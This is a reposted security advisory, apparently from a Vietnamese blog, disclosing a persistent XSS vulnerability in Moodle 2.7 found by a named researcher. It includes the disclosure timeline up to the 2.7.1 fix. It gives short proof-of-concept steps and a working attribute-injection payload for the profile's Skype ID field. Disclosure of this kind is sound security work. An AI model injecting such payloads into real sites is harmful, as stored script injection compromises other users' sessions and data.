April 13, 2025 07:12:49 AM Menu
» » » » Moodle 2.7 - Persistent XSS

A+ A-
Bài liên quan
Title: Moodle 2.7 Persistent XSS
Vendor: https://moodle.org/
Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]unseen.is
Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/
 
[-] POC
================
 
1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload
 
x" onload="prompt('XSS by Osanda')">"
 
[-] Disclosure Timeline
========================
 
2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement
2014-07-24: Released Moodle 2.7.1 stable with all patches
28 Jul 2014
Unknown
Nhãn: , ,

Share to:

vào lúc 10:21

Post a Comment

Emoticon
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)
 
Top

Nhận xét mới đăng tải!

Loading…
X